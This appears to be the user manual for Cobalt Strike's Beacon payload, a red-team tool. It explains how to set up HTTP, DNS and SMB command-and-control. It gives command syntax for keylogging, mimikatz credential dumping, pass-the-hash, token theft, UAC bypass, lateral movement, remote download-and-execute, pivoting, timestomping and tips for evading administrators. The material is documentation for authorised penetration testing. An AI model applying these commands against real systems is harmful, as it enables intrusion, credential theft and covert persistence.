Beacon is Cobalt Strike's payload to model advanced attackers. Use Beacon to egress a network over HTTP, HTTPS, or DNS. You may also limit which hosts egress a network by controlling peer-to-peer Beacons over Windows named pipes.
Like Meterpreter, you may deliver Beacon, directly into memory, with a Metasploit Framework exploit or a Cobalt Strike attack.
Beacon is flexible and supports asynchronous and interactive communication. Asynchronous communication is low and slow. Beacon will phone home, download its tasks, and go to sleep. Interactive communication happens in real-time. In this mode, Beacon becomes a pivot for the Metasploit Framework and Meterpreter.
Beacon's network indicators are malleable. Redefine Beacon's communication with Cobalt Strike's malleable C2 language. This allows you to cloak Beacon activity to look like other malware or blend-in as legitimate traffic.
To use Beacon, you must start a Beacon listener. Go to Cobalt Strike -> Listeners. Press Add.
The Port field specifies the port Beacon will use for its HTTP or HTTPS traffic. The DNS Beacon will always start a DNS server on port 53.
windows/beacon_http/reverse_http is Cobalt Strike's HTTP beacon. This beacon will check for tasks and download them over HTTP. Once you press Save, Cobalt Strike will ask you to provide a list of domains to beacon to. Create DNS A records that point to your Cobalt Strike IP address. If you do not control any domains (shame on you!), provide your IP address in this box.
windows/beacon_https/reverse_https is Cobalt Strike's HTTPS Beacon. This variant of Beacon will SSL encrypt its communication.
Hybrid HTTP and DNS Beacon
windows/beacon_dns/reverse_http is Cobalt Strike's Hybrid HTTP and DNS beacon. This beacon will use DNS to check if tasks are available. If no tasks are available, it will go back to sleep. The Hybrid HTTP and DNS Beacon may use HTTP or DNS as a data channel to get tasks and send output to you.
Once you press Save, Cobalt Strike will ask you to provide a list of domains to beacon to. Create DNS NS records for these domains that point to your Cobalt Strike IP address. You must make Cobalt Strike authoritative for these domains.
To test your DNS configuration, open a terminal and type nslookup jibberish.beacon.domain. If you get an A record reply of 0.0.0.0--then your DNS is correctly setup. If you do not get a reply, then your DNS configuration is not correct and the Hybrid HTTP and DNS Beacon will not communicate with you.
Make sure your DNS records reference the primary address on your network interface. Cobalt Strike's DNS server will always send responses from your network interface's primary address. DNS resolvers tend to drop replies when they request information from one server, but receive a reply from another.
If you are behind a NAT device, make sure you use your public IP address for the NS record and set your firewall to forward UDP traffic on port 53 to your system. Cobalt Strike includes a DNS server to control Beacon.
If Beacon does not connect to you, go to Cobalt Strike -> Listeners. Review the domains and IP addresses it's calling back to. Cobalt Strike will not update the beacon host list if your IP address changes.
windows/beacon_smb/bind_pipe is Cobalt Strike's SMB Beacon. The SMB Beacon uses named pipes to communicate through a parent Beacon. This peer-to-peer communication works with Beacons on the same host. It also works across the network. Windows encapsulates named pipe communication within the SMB protocol. Hence, the name, SMB Beacon.
You may use the SMB Beacon as a target listener for most of Beacon's features. The features that affect the local host will stage over a TCP connection that's setup to avoid the ire of the local host-based firewall. Beacon's lateral movement features will stage the SMB Beacon over a named pipe.
You may also export a stagless SMB Beacon executable or DLL. Go to Attacks -> Packages -> Windows Executable (S) and select SMB Beacon.
An HTTP or DNS Beacon may become an SMB Beacon. Use mode smb to make this change happen. Once a Beacon becomes an SMB Beacon, there is no way to make it beacon over HTTP or DNS again. If you'd like to kill an SMB Beacon, use the exit command. If you'd like to make the host beacon over HTTP or DNS, task the SMB Beacon to give you another Beacon session.
Cobalt Strike Attacks
You may use Beacon with all of Cobalt Strike's attack packages. Create a Beacon listener once and this listener will show up when you setup a Cobalt Strike attack package.
If you setup a DNS Beacon listener, some Cobalt Strike packages will give you two listener options. The first option, listed as listener name, will stage Beacon over HTTP with a Cobalt Strike-specific stager. This HTTP stager is fast and passes through many proxy configurations.
The second option, listed as listener name (DNS), will stage Beacon over the DNS protocol with a Cobalt Strike--specific stager. The DNS stager is valuable for tough egress situations, but--you should use it only when the normal stager is not an option. The DNS Stager will generate a lot of DNS requests and it's not as fast as the normal stager. The DNS stager is available for use with Cobalt Strike's social engineering packages.
You may deliver Beacon with a Metasploit® Framework exploit. Double-click the PAYLOAD option in a module launcher dialog and choose your Beacon listener. Cobalt Strike will configure the module for you.
You may also use Beacon from a Metasploit® Framework console tab. Beacon's C&C server is compatible with the Metasploit® Framework's stagers for Meterpreter. To stage HTTP or DNS Beacon, specify windows/meterpreter/reverse_http as your payload. To stage HTTPS Beacon, specify windows/meterpreter/reverse_https as your payload. Set LHOST to your Cobalt Strike system's IP address, and set LPORT to the port your Beacon web server is listening on.
Managing Beacon Sessions
Cobalt Strike treats a Beacon session different from a Meterpreter session. Hosts infected with Beacon will not turn red with lightning bolts indicating access. To view and manage your Beacon sessions, go to View -> Beacons.
In this tab, Cobalt Strike shows your active Beacons. You will see the external IP address of the Beacon, the internal IP address, when the Beacon last called home, and other information. A * next to the user indicates that the Beacon has administrator privileges.
If you use the Hybrid HTTP and DNS beacon, be aware that Cobalt Strike will not know anything about a host until it checks in for the first time. If you see an entry with a last call time and that's it, you will need to give that Beacon its first task to see more information.
Press Remove to remove a beacon. If the beacon calls home again, it will show up again. Use the Remove button to get rid of stale beacons.
Highlight one or more Beacons and right-click to choose from common post-exploitation options:
Use Message to task Beacon to post a message to the desktop. This is a silly command, but it has its uses. Again, Beacon must reside in a process associated with the desktop you want to post to.
Try Set Note... to assign a note to your Beacon. These notes exist to help you manage Beacons as you see fit. This information is immediately available to your teammates. The note does not persist when you shutdown Cobalt Strike.
Use Sleep to change Beacon's sleep time. Beacon will wait however long you specify between check ins. A higher sleep time makes Beacon harder to catch.
Select Spawn to ask Beacon to spawn a session for you. The Spawn dialog will show listeners from all of the Cobalt Strike team servers you're connected to. This is a simple way to send sessions to another server dedicated to noisy post-exploitation activity.
Use Task URL to ask Beacon to download a file and execute it. This is a great way to quickly deploy another remote administration tool (e.g., DarkComet) to several systems at once.
The Upload menu will upload a file to the target system through Beacon.
Use Clear to quickly clear Beacon's command queue. This is useful if you or someone on your team makes a mistake.
Kill will task Beacon to exit.
The Beacon Manager exposes only some of Beacon's functionality. To take advantage of Beacon, you must use the Beacon console. To open a Beacon console, highlight a Beacon, and press Interact.
The Beacon console allows you to see which tasks were issued to a Beacon and to see when it downloads them. The Beacon console is also where all command output, logged keystrokes, and other information will appear.
Type help in the Beacon console to see available commands. Type help followed by the command name to get more detailed help. Tab completion is available in the Beacon console as well.
Use the sleep command to specify Beacon's sleep time in seconds. By default, Beacon's sleep time has no variance built in. If you'd like the sleep times to vary, specify a jitter percentage after the sleep time. For example, sleep 300 20, will force Beacon to sleep for 300 seconds with a 20% jitter percentage. This means, Beacon will sleep for a random value between 240s to 300s after each check-in.
Use sleep 0 to make Beacon check-in multiple times a second. This is interactive mode.
The Hybrid HTTP and DNS Beacon uses HTTP as a data channel by default. If you're using this form of Beacon, you may ask Beacon to download tasks and send output over the DNS protocol.
Type mode dns to ask Beacon to download tasks with DNS A records. Use mode dns-txt to ask Beacon to get tasks with DNS TXT records. DNS TXT records carry 189 bytes of data per request versus 4 bytes for an A record request. DNS A record requests are more common in network traffic.
Use mode http to signal Beacon to download tasks and send output with the HTTP protocol again. You may change between data channels as needed while using the Hybrid HTTP and DNS Beacon.
The mode dns and mode dns-txt commands have no effect on the HTTP Beacon.
Peer-to-Peer Command and Control
The SMB Beacon is designed for peer-to-peer communication with other Beacons. To gain control of it, another Beacon must link to it.
Linking and Unlinking
Use link [ip address] to link the current Beacon to an SMB Beacon that is waiting for a connection. When the current Beacon checks in, its linked peers will check in too.
To blend in with normal traffic, linked Beacons use Windows named pipes to communicate. This traffic is encapsulated in the SMB protocol. There are a few caveats to this approach:
- Hosts with a Beacon peer must accept connections on port 445.
- You may only link Beacons managed by the same Cobalt Strike instance.
If you get an error 5 (access denied) after you try to link to a Beacon: steal a domain user's token or use shell net use \\host /U:DOMAIN\user password to establish a session with the host. An administrator user is not required for this. Any valid domain user will do. Once you have a session, try to link to the Beacon again.
To destroy a Beacon link use unlink [ip address] in the parent or child. Later, you may link to the unlinked Beacon again (or link to it from another Beacon).
Post Exploitation with Beacon
Beacon's shell command will send a task to execute a command via cmd.exe on the compromised host. When the command completes, Beacon will present the output to you. Use the execute command to execute a command without cmd.exe and without posting output to you.
Use the powershell command to execute a command with PowerShell on the compromised host. The powershell-import command will import a PowerShell script into Beacon. Future uses of the powershell command will have cmdlets from the imported script available to them. Beacon will only hold one PowerShell script at a time.
If you want Beacon to execute commands from a specific directory, use the cd command in the Beacon console to switch the working directory of the Beacon's process.
Beacon's keystroke logger injects into the process you choose and reports keystrokes back to you. Use keylogger pid to inject into an x86 process. Use keylogger pid x64 to inject into an x64 process. explorer.exe is usually a good candidate.
You will receive keystrokes when Beacon checks in. If you're using the Hybrid HTTP and DNS Beacon, use checkin to force Beacon to connect to you and provide captured keystrokes.
Beware that multiple keystroke loggers may conflict with eachother. Use only one keystroke logger per desktop session.
Manage Post-Exploitation Jobs
Beacon treats each shell, powershell, and keystroke logger instance as a job. These jobs run in the background and report their output when it's available. Use the jobs command to see which jobs are running in your Beacon. Use jobkill to kill a job.
Type spawn followed by a listener name to task Beacon to spawn a session for a listener. This command is the same as the right-click Spawn menu item.
By default, the spawn command will spawn a session in rundll32.exe. An alert administrator may find it strange that rundll32.exe is periodically making connections to the internet. Find a better program (e.g., Internet Explorer) and use the spawnto command to state which program Beacon should spawn sessions into.
The spawnto command expects the full path to the program. Type spawnto by itself and press enter to instruct Beacon to go back to its default behavior.
Type inject followed by a process id and a listener name to inject a session into a specific process. Use ps to get a list of processes on the current system.
The inject and spawn commands both inject a stager for the desired listener into memory. This stager tries to connect back to you to stage the requested payload into memory. If the stager can not get past any egress restrictions or blocks that are in place, you will not get a session.
Upload and Download Files
The download command will download the requested file. You do not need to provide quotes around a filename with spaces in it. Beacon is built for low and slow exfil of data. Beacon will download 512KB of each file it's tasked to get after a check in.
To view files downloaded through Beacon, go to View -> Downloads in Cobalt Strike.
The upload command will upload a file to the host. Beacon is not able to upload files larger than 1MB.
Use the meterpreter command to request a Meterpreter session that tunnels its traffic through the current Beacon. When tunneling Meterpreter through Beacon, use sleep 0 to make Beacon check in several times each second.
Beacon will use the current data channel to stage Meterpreter. Meterpreter is big. If mode dns-txt is the data channel, it will take several minutes (over internet DNS infrastructure) to stage Meterpreter. Don't try to stage Meterpreter with mode dns as your data channel.
If HTTP is a viable egress option for you, type mode http before you issue the meterpreter command to use HTTP as a data channel. Once you have a Meterpreter session, you may use one of Beacon's other data channels to manage the Meterpreter session.
Use socks 8080 to setup a SOCKS4a proxy server on port 8080 (or any other port you choose). This will setup a SOCKS proxy server to tunnel traffic through Beacon. Beacon's sleep time adds latency to any traffic you tunnel through it. Use sleep 0 to make Beacon check-in several times a second.
Beacon's HTTP data channel is the most responsive for pivoting purposes. If you'd like to pivot traffic over DNS, use the DNS TXTrecord communication mode.
You may use proxychains to tunnel external tools through Beacon.
Use socks stop to disable the SOCKS proxy server.
You may also tunnel Metasploit® Framework exploits and modules through Beacon. Create a Beacon SOCKS proxy [as described above] and then go to a Metasploit® Framework Console tab (View -> Console). Type:
setg Proxies socks4:127.0.0.1:8080
setg ReverseAllowProxy true
This command will set the Metasploit® Framework Proxies option for all modules executed from this point forward. This option forces the Metasploit® Framework to direct traffic through a SOCKS4 proxy on 127.0.0.1:8080. If you use a different port for Beacon, specify it in the option. Once you're done pivoting through Beacon in this way, use unsetg Proxies to stop this behavior.
Use the rportfwd command to setup a reverse pivot through Beacon. The rportfwd command will bind a port on the compromised target. Any connections to this port will cause your Cobalt Strike server to initiate a connection to another host and port and relay traffic between these two connections. Cobalt Strike tunnels this traffic through Beacon. The syntax for rportfwd is: rportfwd [bind port] [forward host] [forward port].
Use rportfwd stop [bind port] to disable the reverse port forward.
Use getsystem to impersonate a token for the SYSTEM account. This level of access may allow you to perform privileged actions that are not possible as an Administrator user.
Use runas [DOMAIN\user] [password] [command] to run a command as another user using their credentials. The runas command will not return any output. You may use runas from a non-privileged context though.
Use spawnas [DOMAIN\user] [password] [listener] to spawn a session as another user using their credentials. This command uses PowerShell to bootstrap a payload in memory.
Privilege Escalation (UAC Bypass)
Microsoft introduced User Account Control (UAC) in Windows Vista and refined it in Windows 7. UAC works a lot like sudo in UNIX. Day-to-day a user works with normal privileges. When the user needs to perform a privileged action--the system asks if they would like to elevate their rights.
Use bypassuac [listener] to spawn a session in a process with elevated rights. This privilege escalation technique takes advantage of a loophole in the UAC default settings on Windows 7 and later. This command will not work if the current user is not in the Administrators group or if UAC is set to its highest setting. To check if the current user is in the Administrators group, use shell whoami /groups.
Beacon's UAC bypass will drop a DLL file to disk and remove the DLL when it's done. Beacon uses Cobalt Strike's Artifact Kit to generate an anti-virus safe DLL.
Credential and Hash Harvesting
Use the hashdump command to inject into LSASS and dump the password hashes for users on the current system. The wdigest command will use mimikatz to recover plaintext passwords for users who interactively logged on ot the current system since last reboot.
Beacon integrates mimikatz. Use the mimikatz command to pass any command to mimikatz's command dispatcher. For example, mimikatz standard::coffee will give you a cup of coffee. Beacon will take care to inject a mimikatz instance that matches the native architecture of your target. Some mimikatz commands must run as SYSTEM to work. Prefix a command with a ! to force mimikatz to elevate to SYSTEM before it runs your command. For example, mimikatz !lsa::cache will recover salted password hashes cached by the system.
When a user logs onto a Windows host, an access token is generated. This token contains information about the user and their rights. The access token also holds information needed to authenticate the user to another system on the same Active Directory domain. You may steal a token from another process and apply it to your Beacon. When you do this, you may interact with other systems on the domain as that user.
Use steal_token [process id] to impersonate a token from an existing process. If you'd like to see which processes are running use ps. The getuid command will print your current token. Use rev2self to revert back to your original token.
If you know credentials for a user; use make_token [DOMAIN\user] [password] to generate a token that passes these credentials. This token is a copy of your current token with modified single sign-on information. It will show your current username. This is expected behavior.
Use mimikatz to pass-the-hash with Beacon. The Beacon command mimikatz sekurlsa::pth /user:[user] /domain:[DOMAIN] /ntlm:[hash] /run:"powershell -w hidden" will create a process with a token setup to use the single sign-on information you provide. Use steal_token to take the token from this new process and you will inherit its single sign-on information.
Use kerberos_ticket_use [/path/to/ticket] to inject a Kerberos ticket into the current session. This will allow Beacon to interact with remote systems using the rights in this ticket. Try this with a Golden Ticket generated by mimikatz 2.0.
Use kerberos_ticket_purge to clear any kerberos tickets associated with your session.
Once you have a token for a domain admin or a domain user who is a local admin on a target, you may abuse this trust relationship to get control of the target. Cobalt Strike's Beacon has several built-in options for lateral movement.
Use Beacon's psexec [target] [share] [listener] to execute a payload on a remote host. This command will generate a Windows Service executable for your listener, copy it to the share you specify, create a service, start the service, and clean up after itself. Default shares include ADMIN$ and C$.
Use psexec_psh [target] [listener] to execute a payload on a remot host with PowerShell. This command will create a service to run a PowerShell one-liner, start it, and clean up after itself. This method of lateral movement is useful if you do not want to touch disk.
Beacon's winrm [target] [listener] command will use WinRM to execute a payload on a remote host. This option requires that WinRM is enabled on the target system. It's off by default. This option uses PowerShell to bootstrap your payload on target.
Finally, use wmi [target] [listener] to deliver a payload via Windows Management Instrumentation. This command uses PowerShell to bootstrap your payload on target.
Beacon has a few other commands not covered above.
The clear command will clear Beacon's task list. Use this if you make a mistake.
Use dllinject [pid] to inject a Reflective DLL into a process.
Type exit to ask Beacon to exit.
Use kill [pid] to terminate a process.
Use mkdir to make a folder. Use rm to delete a file or folder.
Use the task [url] to ask Beacon to download a file from a URL and execute it.
Use timestomp to match the Modified, Accessed, and Created times of one file to those of another file.